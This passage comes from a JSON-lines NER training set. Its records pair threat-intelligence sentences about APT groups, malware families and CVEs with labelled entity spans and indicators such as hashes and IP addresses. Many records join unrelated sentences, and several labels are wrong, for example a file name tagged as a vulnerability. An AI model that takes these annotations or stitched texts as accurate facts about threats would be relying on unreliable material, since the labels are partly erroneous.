As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions and financial systems to raise money for the North Korean regime .", "spans": {"TOOL: maldoc": [[189, 195]], "ORGANIZATION: ICS": [[220, 223]], "ORGANIZATION: OT staff": [[227, 235]], "THREAT_ACTOR: LYCEUM": [[238, 244]], "THREAT_ACTOR: APT38": [[364, 369]], "ORGANIZATION: financial institutions": [[405, 427]]}, "info": {"id": "cyberner_stix_train_005955", "source": "cyberner_stix_train"}} {"text": "PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach . The attackers behind observed activity in 2018 operate from the Xicheng District of Beijing via the net block 221.216.0.0/13 .", "spans": {"VULNERABILITY: Flash vulnerability": [[108, 127]], "VULNERABILITY: CVE-2015-5119": [[130, 143]]}, "info": {"id": "cyberner_stix_train_005956", "source": "cyberner_stix_train"}} {"text": "For every disk it creates a “ stash ” directory in “ %root stash directory location%\\%volume serial number in hex% ” with attributes FILE_ATTRIBUTE_HIDDEN and FILE_ATTRIBUTE_SYSTEM .", "spans": {}, "info": {"id": "cyberner_stix_train_005957", "source": "cyberner_stix_train"}} {"text": "The RAT stores all the data in a database ( DB ) in order to send it to the Command & Control ( C & C ) server . The group targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . 13.doc : a9bbbf5e4797d90d579b2cf6f9d61443dff82ead9d9ffd10f3c31b686ccf81ab . 
We mentioned Akamai 's blog but it was also documented by Recorded Future .", "spans": {"THREAT_ACTOR: group": [[117, 122]], "ORGANIZATION: media": [[143, 148]], "THREAT_ACTOR: admin@338": [[167, 176]], "TOOL: remote access Trojans": [[234, 255]], "TOOL: Poison Ivy": [[264, 274]], "ORGANIZATION: government": [[285, 295]], "ORGANIZATION: financial firms": [[300, 315]], "ORGANIZATION: global economic": [[332, 347]], "FILEPATH: 13.doc": [[357, 363]], "FILEPATH: a9bbbf5e4797d90d579b2cf6f9d61443dff82ead9d9ffd10f3c31b686ccf81ab": [[366, 430]], "ORGANIZATION: Akamai 's": [[446, 455]], "ORGANIZATION: Recorded Future": [[491, 506]]}, "info": {"id": "cyberner_stix_train_005958", "source": "cyberner_stix_train"}} {"text": "The shellcode performs a DWORD XOR of 4 bytes at an offset from the beginning of the shellcode that changes the code to create a loop so the XOR continues 0x57 times .", "spans": {}, "info": {"id": "cyberner_stix_train_005959", "source": "cyberner_stix_train"}} {"text": "They include the director of speechwriting for Hillary for America and the deputy director office of the chair at the DNC .", "spans": {"ORGANIZATION: DNC": [[118, 121]]}, "info": {"id": "cyberner_stix_train_005960", "source": "cyberner_stix_train"}} {"text": "Trend Micro™ Mobile Security for Enterprise provides device , compliance and application management , data protection , and configuration provisioning , as well as protects devices from attacks that exploit vulnerabilities , preventing unauthorized access to apps , and detecting and blocking malware and fraudulent websites . The new threat actor group was eventually named Silence . This activity cluster , which Kaspersky Lab has followed for a few years , uses various implants for targeting mainly banks , and developers of banking and money processing software solutions . 
for third - party application logging , messaging , and/or other artifacts that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: Trend Micro™": [[0, 12]], "SYSTEM: Mobile Security for Enterprise": [[13, 43]]}, "info": {"id": "cyberner_stix_train_005961", "source": "cyberner_stix_train"}} {"text": "Both malware kill all current browsers before installing fake certificates :", "spans": {}, "info": {"id": "cyberner_stix_train_005962", "source": "cyberner_stix_train"}} {"text": "The information operations unit , Unit 74455 , was commanded by Colonel Aleksandr Vladimirovich Osadchuk .", "spans": {"THREAT_ACTOR: Unit 74455": [[34, 44]]}, "info": {"id": "cyberner_stix_train_005963", "source": "cyberner_stix_train"}} {"text": "] com ( and third-levels of this domain ) www3.mefound [ . The group also deploys the SOGU and CROSSWALK malware families as means to maintain presence . For these CozyDuke campaigns however , the Dukes appear to have employed two particular later-stage toolsets , SeaDuke and HammerDuke .", "spans": {"THREAT_ACTOR: group": [[63, 68]], "THREAT_ACTOR: Dukes": [[197, 202]], "MALWARE: SeaDuke": [[265, 272]], "MALWARE: HammerDuke": [[277, 287]]}, "info": {"id": "cyberner_stix_train_005964", "source": "cyberner_stix_train"}} {"text": "There are various types of actors involved in the mobile malware industry : virus writers , testers , interface designers of both the malicious apps and the web pages they are distributed from , owners of the partner programs that spread the malware , and mobile botnet owners . The tools found in this campaign , such as the HyperBro Trojan , are regularly used by a variety of Chinese-speaking actors . ESET researchers recently published a white paper updating our understanding of the arsenal of the Winnti Group , following a blog post documenting a supply-chain attack targeting the videogame industry in Asia . 
Two examples are Windows Sysinternals SDelete and Active@ Killdisk .", "spans": {"TOOL: HyperBro Trojan": [[326, 341]], "ORGANIZATION: ESET": [[405, 409]], "THREAT_ACTOR: Winnti Group": [[504, 516]], "TOOL: Windows Sysinternals": [[635, 655]], "TOOL: SDelete": [[656, 663]], "TOOL: Active@ Killdisk": [[668, 684]]}, "info": {"id": "cyberner_stix_train_005965", "source": "cyberner_stix_train"}} {"text": "This isn’t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . After performing investigations on the classified victims , we find the attacker targets big companies and government agencies in Colombia .", "spans": {"MALWARE: it": [[26, 28]], "ORGANIZATION: government agencies": [[272, 291]]}, "info": {"id": "cyberner_stix_train_005966", "source": "cyberner_stix_train"}} {"text": "Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER , suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy . One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges .", "spans": {"TOOL: BitPaymer": [[28, 37]], "THREAT_ACTOR: INDRIK SPIDER": [[78, 91]], "MALWARE: dropper": [[251, 258]], "SYSTEM: Windows": [[272, 279]]}, "info": {"id": "cyberner_stix_train_005967", "source": "cyberner_stix_train"}} {"text": "Microsoft Threat Intelligence has observed that the malware used by TERBIUM , dubbed \" Depriz \" by Microsoft , reuses several components and techniques seen in the 2012 attacks , and has been highly customized for each targeted organization . 
PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": {"ORGANIZATION: Microsoft Threat Intelligence": [[0, 29]], "THREAT_ACTOR: TERBIUM": [[68, 75]], "THREAT_ACTOR: Depriz": [[87, 93]], "ORGANIZATION: Microsoft": [[99, 108]], "MALWARE: PIVY": [[243, 247], [509, 513]], "ORGANIZATION: chemical makers": [[321, 336]], "ORGANIZATION: government agencies": [[339, 358]], "ORGANIZATION: defense contractors": [[361, 380]], "THREAT_ACTOR: attackers": [[451, 460]], "VULNERABILITY: zero-day": [[468, 476]]}, "info": {"id": "cyberner_stix_train_005968", "source": "cyberner_stix_train"}} {"text": "Windows We have found multiple components that form an entire spyware system for the Windows platform . It is worth noting that in December 2016 , Amnesty International published an investigation into another social engineering campaign perpetrated by a seemingly fake human rights organization known as Voiceless Victims , which targeted international human rights and labour rights organizations campaigning on migrant workers’ rights in Qatar . Putter Panda : APT2 , MSUpdater .", "spans": {"SYSTEM: Windows": [[0, 7], [85, 92]], "THREAT_ACTOR: Voiceless": [[304, 313]], "THREAT_ACTOR: Putter Panda": [[448, 460]], "THREAT_ACTOR: APT2": [[463, 467]], "THREAT_ACTOR: MSUpdater": [[470, 479]]}, "info": {"id": "cyberner_stix_train_005969", "source": "cyberner_stix_train"}} {"text": "For our M-Trends 2017 report , we took a look at the incidents we investigated last year and provided a global and regional (the Americas , APAC and EMEA) analysis focused on attack trends , and defensive and emerging trends . 
This APT group usually carries out target attacks against government agencies to steal sensitive information .", "spans": {"ORGANIZATION: M-Trends": [[8, 16]], "ORGANIZATION: defensive": [[195, 204]], "ORGANIZATION: emerging": [[209, 217]], "ORGANIZATION: government agencies": [[285, 304]]}, "info": {"id": "cyberner_stix_train_005970", "source": "cyberner_stix_train"}} {"text": "The targeting of critical infrastructure to disrupt , degrade , or destroy systems is consistent with numerous attack and reconnaissance activities carried out globally by Russian , Iranian , North Korean , U.S. , and Israeli nation state actors . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 .", "spans": {"ORGANIZATION: critical infrastructure": [[17, 40]], "THREAT_ACTOR: actors": [[239, 245]], "ORGANIZATION: McAfee Advanced Threat Research": [[252, 283]], "FILEPATH: data-gathering implant": [[321, 343]]}, "info": {"id": "cyberner_stix_train_005971", "source": "cyberner_stix_train"}} {"text": "BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including education .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "VULNERABILITY: zero-day vulnerability": [[69, 91]], "MALWARE: Epic Turla": [[272, 282]], "ORGANIZATION: education": [[361, 370]]}, "info": {"id": "cyberner_stix_train_005972", "source": "cyberner_stix_train"}} {"text": "A ZIP archive recovered during our investigations , schtasks.zip , contained an installer and uninstaller of CATRUNNER that includes two versions of an XML scheduled task definitions for a masquerading service ‘ ProgramDataUpdater . 
’ The malicious installation version has a task name and description in English , and the clean uninstall version has a task name and description in Cyrillic .", "spans": {"TOOL: ZIP": [[2, 5]], "FILEPATH: schtasks.zip": [[52, 64]], "MALWARE: CATRUNNER": [[109, 118]], "TOOL: XML": [[152, 155]], "TOOL: ProgramDataUpdater": [[212, 230]]}, "info": {"id": "cyberner_stix_train_005973", "source": "cyberner_stix_train"}} {"text": "The backdoor code is believed to have been left by mistake by the authors after completing the debugging process . This script relays commands and output between the controller and the system . Outlaw : 45.9.148.125:80 Miner pool . The increasing usage of bring your own device BYOD in hybrid work environments has changed the technology landscape for organizations .", "spans": {"THREAT_ACTOR: Outlaw": [[194, 200]], "IP_ADDRESS: 45.9.148.125:80": [[203, 218]], "TOOL: Miner pool": [[219, 229]], "ORGANIZATION: bring your own device BYOD in hybrid work environments has changed the technology landscape for organizations": [[256, 365]]}, "info": {"id": "cyberner_stix_train_005974", "source": "cyberner_stix_train"}} {"text": "Coming back to the execution flow , once the spyware hides itself , it starts an Android service named MainService . The standard network protocol for Gh0st RAT 3.6 employs zlib compression , which utilizes ‘Gh0st’ as a static five-byte packet flag that must be included in the first five bytes of initial transmission from the victim . When received by a Winnti infected host , it will validate the received packet and listen for a second inbound request containing tasking .", "spans": {"SYSTEM: Android": [[81, 88]], "THREAT_ACTOR: Gh0st RAT 3.6": [[151, 164]], "TOOL: zlib compression": [[173, 189]], "MALWARE: Winnti": [[356, 362]]}, "info": {"id": "cyberner_stix_train_005975", "source": "cyberner_stix_train"}} {"text": "\" Pitty Tiger \" is also a string transmitted in the network communications of the RAT . 
In 2017 , the number of attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted .", "spans": {"THREAT_ACTOR: Pitty Tiger": [[2, 13]], "TOOL: string": [[26, 32]], "TOOL: RAT": [[82, 85]], "ORGANIZATION: banks": [[152, 157]], "ORGANIZATION: law firm": [[162, 170]], "ORGANIZATION: bank": [[177, 181]]}, "info": {"id": "cyberner_stix_train_005976", "source": "cyberner_stix_train"}} {"text": "Without mobile threat detection , this attack would not be detected , leaving end users and organizations at risk . This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . APT10 , a name originally coined by FireEye , is also referred to as Red Apollo by PwC UK , CVNX by BAE Systems , Stone Panda by CrowdStrike , and menuPass Team more broadly in the public domain .", "spans": {"MALWARE: document": [[150, 158]], "VULNERABILITY: Trump's_Attack_on_Syria_English.docx”": [[165, 202]], "THREAT_ACTOR: APT10": [[205, 210]], "ORGANIZATION: FireEye": [[241, 248]], "THREAT_ACTOR: Red Apollo": [[274, 284]], "ORGANIZATION: PwC UK": [[288, 294]], "THREAT_ACTOR: CVNX": [[297, 301]], "ORGANIZATION: BAE Systems": [[305, 316]], "THREAT_ACTOR: Stone Panda": [[319, 330]], "ORGANIZATION: CrowdStrike": [[334, 345]], "THREAT_ACTOR: menuPass Team": [[352, 365]]}, "info": {"id": "cyberner_stix_train_005977", "source": "cyberner_stix_train"}} {"text": "The division in malware was consistent and definitive at that point .", "spans": {}, "info": {"id": "cyberner_stix_train_005978", "source": "cyberner_stix_train"}} {"text": "] pw/4 * * * * * 7 ” ( It . On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . 
The second task of malware is to ping the CC and get orders .", "spans": {"ORGANIZATION: FireEye": [[46, 53]], "THREAT_ACTOR: APT34": [[63, 68]], "VULNERABILITY: vulnerability": [[111, 124]], "ORGANIZATION: government organization": [[137, 160]]}, "info": {"id": "cyberner_stix_train_005979", "source": "cyberner_stix_train"}} {"text": "Jaff appeared in multi-million message campaigns for roughly a month and then promptly disappeared as soon as a decryptor was released in mid-June 2017 .", "spans": {"MALWARE: Jaff": [[0, 4]], "TOOL: decryptor": [[112, 121]]}, "info": {"id": "cyberner_stix_train_005980", "source": "cyberner_stix_train"}} {"text": "All those functions are implemented in asynchronous tasks by “ org.starsizew.i ” . Over the course of the attack campaign , we have observed two different variations of the Helminth backdoor , one written in VBScript and PowerShell that was delivered via a macro within Excel spreadsheets and the other a standalone Windows executable . The malware tries to save the C2 response and encoding it using Encode function . Cisco Secure Network / Cloud Analytics ( Stealthwatch / Stealthwatch Cloud ) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device .", "spans": {"TOOL: Helminth backdoor": [[173, 190]], "TOOL: C2": [[367, 369]], "TOOL: Cisco Secure Network / Cloud Analytics": [[419, 457]], "TOOL: Stealthwatch / Stealthwatch Cloud": [[460, 493]]}, "info": {"id": "cyberner_stix_train_005981", "source": "cyberner_stix_train"}} {"text": "Further analysis Upon further research , we found this spyware to be developed by a framework similar to Spynote and Spymax , meaning this could be an updated version of these Trojan builders , which allow anyone , even with limited knowledge , to develop full-fledged spyware . There are multiple possibilities as to how Buckeye obtained Equation Group tools before the Shadow Brokers leak . 
The group has demonstrated similarity to another activity group called PROMETHIUM due to overlapping victim and campaign characteristics .", "spans": {"MALWARE: Spynote": [[105, 112]], "MALWARE: Spymax": [[117, 123]], "THREAT_ACTOR: Buckeye": [[322, 329]], "THREAT_ACTOR: Equation Group": [[339, 353]], "THREAT_ACTOR: PROMETHIUM": [[464, 474]]}, "info": {"id": "cyberner_stix_train_005982", "source": "cyberner_stix_train"}} {"text": "In this case , a sample from the IBM report indicated the document author ‘ gerry.knight ’ which led us to the following three additional samples . spear phishing : 2a0df97277ddb361cecf8726df6d78ac 5e5ea1a67c2538dbc01df28e4ea87472 d30b8468d16b631cafe458fd94cc3196 . spear phishing : 104.218.120.128 .", "spans": {"ORGANIZATION: IBM": [[33, 36]], "FILEPATH: 2a0df97277ddb361cecf8726df6d78ac": [[165, 197]], "FILEPATH: 5e5ea1a67c2538dbc01df28e4ea87472": [[198, 230]], "FILEPATH: d30b8468d16b631cafe458fd94cc3196": [[231, 263]], "IP_ADDRESS: 104.218.120.128": [[283, 298]]}, "info": {"id": "cyberner_stix_train_005983", "source": "cyberner_stix_train"}} {"text": "At that time , Ginp was a simple SMS stealer whose purpose was only to send a copy of incoming and outgoing SMS messages to the C2 server . Yet again , new supply-chain attacks recently caught the attention of ESET Researchers . It is known to use a variety of malware , including Sysget / HelloBridge , PlugX , PoisonIvy , FormerFirstRat , NFlog , and NewCT .", "spans": {"MALWARE: Ginp": [[15, 19]], "ORGANIZATION: ESET": [[210, 214]], "MALWARE: Sysget": [[281, 287]], "MALWARE: HelloBridge": [[290, 301]], "MALWARE: PlugX": [[304, 309]], "MALWARE: PoisonIvy": [[312, 321]], "MALWARE: FormerFirstRat": [[324, 338]], "MALWARE: NFlog": [[341, 346]], "MALWARE: NewCT": [[353, 358]]}, "info": {"id": "cyberner_stix_train_005984", "source": "cyberner_stix_train"}} {"text": "Stage 3 : Installer that takes DLL side-loading to a new level Stage 3 represents the setup program for FinFisher . 
In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . Decoding is a simple inverse operation . The ransomware will then scan the disk and any files matching predefined criteria are encrypted and the original files are deleted .", "spans": {"MALWARE: FinFisher": [[104, 113]], "THREAT_ACTOR: APT34": [[135, 140]], "VULNERABILITY: Microsoft Office vulnerability": [[155, 185]], "VULNERABILITY: CVE-2017-11882": [[186, 200]], "TOOL: POWRUNER": [[211, 219]], "TOOL: BONDUPDATER": [[224, 235]], "ORGANIZATION: Microsoft": [[259, 268]], "MALWARE: ransomware": [[331, 341]]}, "info": {"id": "cyberner_stix_train_005985", "source": "cyberner_stix_train"}} {"text": "The ShadowBrokers is a group of hackers known for leaking exclusive information about the National Security Agency – NSA 's hacking tools and tactics . Blackgear 's campaigns also use email as an entry point , which is why it's important to secure the email gateACT .", "spans": {"THREAT_ACTOR: ShadowBrokers": [[4, 17]], "ORGANIZATION: NSA": [[117, 120]]}, "info": {"id": "cyberner_stix_train_005986", "source": "cyberner_stix_train"}} {"text": "C2 servers associated with this activity are blocked through Threat Prevention DNS signatures .", "spans": {"TOOL: C2": [[0, 2]], "TOOL: servers": [[3, 10]]}, "info": {"id": "cyberner_stix_train_005987", "source": "cyberner_stix_train"}} {"text": "The weaponized documents targeted several government entities around the globe , including North America , Europe , and a former USSR state .", "spans": {}, "info": {"id": "cyberner_stix_train_005988", "source": "cyberner_stix_train"}} {"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . 
The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B .", "spans": {"MALWARE: RTF attachments": [[44, 59]], "VULNERABILITY: CVE-2017-0199": [[124, 137]], "ORGANIZATION: development company": [[293, 312]], "FILEPATH: CONFUCIUS_A": [[327, 338]], "FILEPATH: CONFUCIUS_B": [[343, 354]]}, "info": {"id": "cyberner_stix_train_005989", "source": "cyberner_stix_train"}} {"text": "Dridex itself appeared shortly after the Zeus banking Trojan was taken down .", "spans": {"MALWARE: Dridex": [[0, 6]], "MALWARE: Zeus": [[41, 45]], "MALWARE: Trojan": [[54, 60]]}, "info": {"id": "cyberner_stix_train_005990", "source": "cyberner_stix_train"}} {"text": "At the same time , the lack of encryption , use of a public FTP server and the low opsec level could indicate that less skilled attackers are behind the malware . This campaign , dubbed Operation GhostSecret , leverages multiple implants , tools , and malware variants associated with the state-sponsored cyber group HIDDEN COBRA . This tool was then installed to csidl_profile\\appdata\\roaming\\adobe\\ftp.exe . Adversaries may manipulate physical process control within the industrial environment .", "spans": {"THREAT_ACTOR: cyber group": [[305, 316]], "THREAT_ACTOR: HIDDEN COBRA": [[317, 329]], "FILEPATH: csidl_profile\\appdata\\roaming\\adobe\\ftp.exe": [[364, 407]]}, "info": {"id": "cyberner_stix_train_005991", "source": "cyberner_stix_train"}} {"text": "At the time of writing , the content served at the given URL on uyghurapps [ . Moreover , Turla now also has a heavily obfuscated PowerShell Trojan that is similar to KopiLuwak . 
APT1 were a highly prolific cyber-attack group operating out of China .", "spans": {"THREAT_ACTOR: Turla": [[90, 95]], "THREAT_ACTOR: APT1": [[179, 183]]}, "info": {"id": "cyberner_stix_train_005992", "source": "cyberner_stix_train"}} {"text": "The same is true for banking malware . The targeting of an organization rather than individuals , and the high ransom demands , made BitPaymer stand out from other contemporary ransomware at the time . Once gaining a foothold on a user 's system , the threat actors behind STOLEN PENCIL use Microsoft 's Remote Desktop Protocol ( RDP ) for remote point-and-click access .", "spans": {"TOOL: BitPaymer": [[133, 142]], "ORGANIZATION: Microsoft": [[291, 300]], "TOOL: Remote Desktop Protocol": [[304, 327]], "TOOL: RDP": [[330, 333]]}, "info": {"id": "cyberner_stix_train_005993", "source": "cyberner_stix_train"}} {"text": "Aside from the credential stealing , this malware also includes features like the theft of users ' contact list , collecting phone numbers associated names , and files and photos on the device . Commodity RATs also complicate efforts by security professionals to correlate a threat actor 's activity over time—attackers can hide in the sea of malicious activity that also uses Poison Ivy-based malware . OceanLotus : ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 Loader #1 . 
A Microsoft Exchange server is composed of two major components : the frontend , also known as the Client Access Service , and the backend .", "spans": {"TOOL: RATs": [[205, 209]], "THREAT_ACTOR: threat actor": [[275, 287]], "TOOL: Poison Ivy-based malware": [[377, 401]], "THREAT_ACTOR: OceanLotus": [[404, 414]], "FILEPATH: ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4": [[417, 481]], "SYSTEM: Microsoft Exchange server": [[496, 521]], "SYSTEM: Client Access Service": [[593, 614]]}, "info": {"id": "cyberner_stix_train_005994", "source": "cyberner_stix_train"}} {"text": "The following factors in this cyber attack suggests the possible involvement of Pakistan state sponsored cyber espionage group to mainly spy on India ’s actions related to these Geo-political events ( Uri terror attack and Jammu & Kashmir protests ) .", "spans": {}, "info": {"id": "cyberner_stix_train_005995", "source": "cyberner_stix_train"}} {"text": "At least eight sellers update the website as frequently as daily , offering newly obtained databases from the U.S . In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe .", "spans": {"THREAT_ACTOR: sellers": [[15, 22]], "THREAT_ACTOR: PROMETHIUM": [[141, 151]], "THREAT_ACTOR: NEODYMIUM": [[156, 165]], "ORGANIZATION: specific individuals": [[210, 230]]}, "info": {"id": "cyberner_stix_train_005996", "source": "cyberner_stix_train"}} {"text": "Originally targeting Western European banks , Emotet has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . 
Based on the mutexes and domain names of some of their C&C servers , BlackTech 's campaigns are likely designed to steal their target 's technology .", "spans": {"ORGANIZATION: banks": [[38, 43]], "TOOL: Emotet": [[46, 52], [166, 172]], "TOOL: C&C": [[346, 349]]}, "info": {"id": "cyberner_stix_train_005997", "source": "cyberner_stix_train"}} {"text": "The Spark Campaign : This campaign uses social engineering to infect victims , mainly from the Palestinian territories , with the Spark backdoor .", "spans": {"MALWARE: Spark": [[4, 9]], "MALWARE: Spark backdoor": [[130, 144]]}, "info": {"id": "cyberner_stix_train_005998", "source": "cyberner_stix_train"}} {"text": "Initiating the MQTT client . APT33 has targeted organizations – spanning multiple industries – headquartered in the United States , Saudi Arabia and South Korea . The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS ) bitsadmin.exe to receive commands and exfiltrate . Germany retained its place as the fourth most attacked country in the world , and the most attacked country outside of the anglosphere .", "spans": {"THREAT_ACTOR: APT33": [[29, 34]], "ORGANIZATION: spanning multiple industries": [[64, 92]], "ORGANIZATION: Microsoft": [[193, 202]], "TOOL: Trojan": [[257, 263]], "SYSTEM: Windows": [[278, 285]], "TOOL: Microsoft Background Intelligent Transfer Service": [[301, 350]], "TOOL: (BITS": [[351, 356]], "FILEPATH: bitsadmin.exe": [[359, 372]]}, "info": {"id": "cyberner_stix_train_005999", "source": "cyberner_stix_train"}} {"text": "It detects this ransomware ( AndroidOS/MalLocker.B ) , as well as other malicious apps and files using cloud-based protection powered by deep learning and heuristics , in addition to content-based detection . All of the CnC communications are performed over the HTTP protocol . 
In should be noted that the tool may not work for the updated versions of ANEL if they are compiled with different options of the obfuscating compiler . Based on the use of domain names they registered , the group started out in the business of fake / rogue anti - virus products in 2007 .", "spans": {"TOOL: HTTP protocol": [[262, 275]], "THREAT_ACTOR: ANEL": [[352, 356]], "MALWARE: fake / rogue anti - virus products": [[523, 557]]}, "info": {"id": "cyberner_stix_train_006000", "source": "cyberner_stix_train"}} {"text": "These actions demonstrate a well-resourced adversary with a thorough implant-testing regime that is highly attuned to slight configuration issues that may result in their detection , and which would cause them to deploy a different tool instead .", "spans": {}, "info": {"id": "cyberner_stix_train_006001", "source": "cyberner_stix_train"}} {"text": "More and more smartphone and tablet owners use their devices to access websites , unaware that even the most reputable resources can be hacked . The group has been active since at least 2010 and was behind many previous attack campaigns resulting in the theft of massive amounts of data from the directors and managers of US-based defense contractors . And the usual RC5 encryption with a key derived from the volume ID of the system drive of the victim machine ( as seen in the PortReuse backdoor , skip-2.0 and some ShadowPad variants ) is not present either . 
They will frequently compromise a system to then place the hidden service on that particular system .", "spans": {"ORGANIZATION: defense contractors": [[331, 350]], "MALWARE: PortReuse backdoor": [[479, 497]], "MALWARE: skip-2.0": [[500, 508]], "MALWARE: ShadowPad": [[518, 527]]}, "info": {"id": "cyberner_stix_train_006002", "source": "cyberner_stix_train"}} {"text": "To spread the toolset , the Dukes used a wrapper to combine OnionDuke with legitimate applications , created torrent files containing these trojanized applications , then uploaded them to websites hosting torrent files .", "spans": {"THREAT_ACTOR: Dukes": [[28, 33]], "MALWARE: OnionDuke": [[60, 69]]}, "info": {"id": "cyberner_stix_train_006003", "source": "cyberner_stix_train"}} {"text": "The WebView-based overlay is loading an HTML page provided by the C2 in response to the package name provided by the bot . We were particularly interested in identifying whether any customers of the targeted MSPs were subsequently compromised by APT10 , given their potential access through compromised MSP networks . The payload is based on “ Nameless Backdoor ” which has been publicly available for more than ten years .", "spans": {"THREAT_ACTOR: APT10": [[246, 251]], "ORGANIZATION: MSP": [[303, 306]], "MALWARE: Nameless Backdoor": [[344, 361]]}, "info": {"id": "cyberner_stix_train_006004", "source": "cyberner_stix_train"}} {"text": "co.edgesecure.app com.arcbit.arcbit distributedlab.wallet de.schildbach.wallet_test com.aegiswallet com.plutus.wallet com.coincorner.app.crypt eth.org.freewallet.app secret.access secret.pattern RuMMS : The Latest Family of Android Malware Attacking Users in Russia Via SMS Phishing April 26 , 2016 Introduction Recently we observed an Android malware family being used to attack users in Russia . Meanwhile , NEODYMIUM used well-tailored spear-phishing emails with attachments that delivered the exploit code , ultimately leading to Wingbird 's installation on victim computers . 
Brief Description : Doc file weaponized with Exploit . Although Mandiant has no data on the objectives of this threat actor , their broad targeting across industries and geographies is consistent with a targeting calculus most commonly seen among financially motivated groups .", "spans": {"MALWARE: RuMMS": [[195, 200]], "SYSTEM: Android": [[224, 231]], "MALWARE: Android": [[336, 343]], "THREAT_ACTOR: NEODYMIUM": [[410, 419]], "TOOL: Wingbird": [[534, 542]], "ORGANIZATION: Mandiant": [[644, 652]]}, "info": {"id": "cyberner_stix_train_006005", "source": "cyberner_stix_train"}} {"text": "STRING & DATA OBFUSCATION Bread apps have used many innovative and classic techniques to hide strings from analysis engines . Anchor Panda uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities . User Account Management System . While one of his signatures uses his own blog domain , there is also a second signature which uses 93[.]gd , a domain that was found to have been actively selling VPS services in the past .", "spans": {"TOOL: CVE software vulnerabilities": [[308, 336]]}, "info": {"id": "cyberner_stix_train_006006", "source": "cyberner_stix_train"}} {"text": "Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images . 
Based on this , we believe the Rancor attackers were targeting political entities .", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "THREAT_ACTOR: APT32": [[34, 39]], "THREAT_ACTOR: Rancor": [[158, 164]], "THREAT_ACTOR: attackers": [[165, 174]], "ORGANIZATION: political entities": [[190, 208]]}, "info": {"id": "cyberner_stix_train_006007", "source": "cyberner_stix_train"}} {"text": "The tool uses the Windows Management Instrumentation ( WMI ) event consumer for persistence by installing a script to the system's WMI registry .", "spans": {"SYSTEM: Windows": [[18, 25]], "TOOL: Management Instrumentation": [[26, 52]], "TOOL: WMI": [[55, 58], [131, 134]]}, "info": {"id": "cyberner_stix_train_006008", "source": "cyberner_stix_train"}} {"text": "In April 2013 , a third-party vendor published a report about a cyberespionage group using custom malware and stolen certificates in their operations .", "spans": {}, "info": {"id": "cyberner_stix_train_006009", "source": "cyberner_stix_train"}} {"text": "EventBot decryption of packets from the C2 Decryption of packets from the C2 using Curve25519 . In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . The resume contained the PupyRAT backdoor , which communicated with known APT35 infrastructure .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: VBA2Graph": [[119, 128]], "MALWARE: PupyRAT backdoor": [[234, 250]], "THREAT_ACTOR: APT35": [[283, 288]]}, "info": {"id": "cyberner_stix_train_006010", "source": "cyberner_stix_train"}} {"text": "That was our first hint that we were looking at KASPERAGENT .", "spans": {"MALWARE: KASPERAGENT": [[48, 59]]}, "info": {"id": "cyberner_stix_train_006011", "source": "cyberner_stix_train"}} {"text": "The short URL redirects to the application page at Google Play . From 2016 through 2017 , two consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations . 
While researching this campaign approximately 180 variants were located in the wild . As MuddyWater is assessed to be primarily focused on cyberespionage , it is very likely that data theft is the primary objective behind the Earth Vetala campaign .", "spans": {"SYSTEM: Google Play": [[51, 62]], "ORGANIZATION: consumer products corporations": [[94, 124]], "THREAT_ACTOR: APT32": [[171, 176]], "THREAT_ACTOR: MuddyWater": [[289, 299]]}, "info": {"id": "cyberner_stix_train_006012", "source": "cyberner_stix_train"}} {"text": "The core malware ’ s icon is hidden . Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 . Layers of obfuscation , encryption , and the use of randomized file names hid the installation process . Acquire Infrastructure : Web Services APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware , such as HAMMERTOSS .", "spans": {"MALWARE: decoy slideshow": [[46, 61]], "THREAT_ACTOR: Web Services APT29": [[292, 310]], "SYSTEM: C2": [[386, 388]], "MALWARE: malware": [[392, 399]], "MALWARE: HAMMERTOSS": 